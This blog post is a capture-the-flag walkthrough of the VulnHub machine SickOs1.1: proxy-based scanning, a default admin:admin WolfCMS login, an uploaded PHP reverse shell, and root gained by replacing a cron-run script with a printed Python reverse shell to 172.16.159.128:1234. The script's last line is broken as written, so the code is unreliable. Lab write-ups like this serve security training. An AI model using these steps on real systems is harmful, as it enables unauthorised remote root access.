---
title:      "SickOs1.1 WriteUp"
date:       2016-10-30 18:00:00
tags: [pentesting,writeup,vulnhub,sickos]
---
Today we will be solving a boot2root virtual machine from [vulnhub](http://www.vulnhub.com) that promises to be very interesting.

According to its creator, it is an entry-level machine, similar to the ones we could face on the OSCP labs, so if anyone is interested in tackling this certification, this could be an interesting starting point.

## Reconnaissance
Once booted the virtual machine (loaded on VMWare Player, NAT network configuration), we start by locating the victim with __*netdiscover*__ from the attacking machine in the same virtual network (a Kali installation in my case).

{% include image.html
            img="images/sickos1/sickos1.1-1.png"
            title="Execution of the netdiscover tool"
            caption="IP addresses .1, .2 and .254 are used by VMWare for NAT administration, so the address of our victim is 172.16.159.129" %}

## Scanning
Our inseparable friend *__nmap__* could not miss this party. Initially, we launch a full scan on every TCP port to see what services may be running.

{% include image.html
            img="images/sickos1/sickos1.1-2.png"
            title="nmap scan"
            caption="Preliminary scan with nmap" %}

We have __an SSH server open and a SQUID server__. The SSH server does not seem to be a vulnerable version, so SQUID will be our main attack vector for now.

### Fiddling with the proxy
Inspecting the SQUID server via browser we find out that it is working as an access filter.

{% include image.html
            img="images/sickos1/sickos1.1-3.png"
            title="SQUID error message"
            caption="SQUID blocks our access" %}

Editing the browser settings enables us to access through the proxy server offered by SQUID.

{% include image.html
            img="images/sickos1/sickos1.1-4.png"
            title="Browser proxy settings"
            caption="From now on, all our browser traffic will go trough the proxy, so it will be possible to access new resources" %}

Once the proxy is configured, the next logical step is to start with well-known ports in order to determine whether there is any web server running.

### Web scanning
We find an apparently simple web page on TCP port 80.

{% include image.html
            img="images/sickos1/sickos1.1-5.png"
            title="Web server on port 80"
            caption="HTML page without much more to offer" %}

Now that we know that there is a server running, it is worth trying *__nikto__* on it.

{% include image.html
            img="images/sickos1/sickos1.1-6.png"
            title="First half of nikto scan"
            caption="First half of nikto scan, the proxy is used for redirecting the scan" %}


{% include image.html
            img="images/sickos1/sickos1.1-7.png"
            title="Second half of nikto scan"
            caption="Second half of nikto scan" %}

Among all the interesting information found, we can make two important points:

* There exists a __robots.txt__ file, which kindly requests to search engine spiders not to index some pages inside a website, so it could contain something interesting.
* Some CGI are vulnerable to __shellshock__.

Willing to continue on the scanning stage, I decided to investigate the __robots.txt__ file, having __shellshock__ as ace on my sleeve just in case.

The __robots.txt__ file contains the following:  
```
    User-agent: *  
    Disallow: /  
    Disallow: /wolfcms
```

### WolfCMS
The */wolfcms* route seems promising, let's take a look.

{% include image.html
            img="images/sickos1/sickos1.1-8.png"
            title="WolfCMS initial page"
            caption="WolfCMS initial page" %}

A content management system is always something interesting, as it could enable us to upload useful files to the server. After digging a bit inside the official documentation, we discover the administrator login page.

{% include image.html
            img="images/sickos1/sickos1.1-9.png"
            title="WolfCMS admin login"
            caption="WolfCMS admistrator login page" %}

## Intrusion

### Web service
After various combination of users and passwords, we are lucky with __admin:admin__. It is certainly not the most impressive way of breaking into a system, but human mistakes as easy credentials are always dangerous risks that play in favour of an attacker.

### Limited shell
We find an administration interface that allows to upload files to the */public* directory. As we already knew, what we have is an __Apache__ server on our hands (thanks *__nikto__*) so we will try with a __[PHP script](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) for a reverse TCP connection__.


{% include image.html
            img="images/sickos1/sickos1.1-10.png"
            title="WolfCMS administrator interface"
            caption="WolfCMS administrator interface" %}

The next thing to do is opening a listening port with *__netcat__* in order to receive the connection request from our victim.

{% include image.html
            img="images/sickos1/sickos1.1-11.png"
            title="nc -v -n -l -p 9999"
            caption="Open listening port on attacking machine" %}

After modifying the script in order to point at our IP address and TCP port, __we upload the file and invoke it from *http://172.16.159.129/wolfcms/public/php-reverse-shell.php*__ through the browser, and we will obtain a limited shell.

{% include image.html
            img="images/sickos1/sickos1.1-12.png"
            title="Receiving the reverse TCP shell"
            caption="Access to system with user __www-data__" %}

### Privilege Escalation
Once inside the server, we start snooping the directory tree until finding what will be the key to root.

{% include image.html
            img="images/sickos1/sickos1.1-13.png"
            title="ls /etc/cron.d; cat /etc/cron.d/automate"
            caption="Script executed by root every minute" %}

It appears that we have writing permission on a python script executed by user __root__ every minute through *crontab*. From here on, there are many ways of proceeding, but I chose to keep with the reverse shell technique.

Adapting __[this one-line command](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)__, we substitute the python file for the next script:

```python
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("172.16.159.128",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p.subprocess.call(["/bin/sh","-i"])
```
With the script ready, we only have to wait until it is executed and obtain a root shell.

{% include image.html
            img="images/sickos1/sickos1.1-14.png"
            title="-v -n -l -p 1234"
            caption="Obtaining root shell" %}

## Flag
Finally, we obtain the flag from the */root* directory.

{% include image.html
            img="images/sickos1/sickos1.1-15.png"
            title="Flag."
            caption="CTF flag" %}

## Conclusions
It is obviously not the hardest machine you can find out there, yet it is very complete and close to reality. All pentesting steps must be covered (skipping *footprinting*, naturally) and, as it is common, there is not only one way of clearing the obstacles to our goal. In my opinion, a funny machine, useful for dusting off old habits and skills.

<iframe width="560" height="315" src="https://www.youtube.com/embed/4DHHv5OuEzY" frameborder="0" allowfullscreen="1"></iframe>
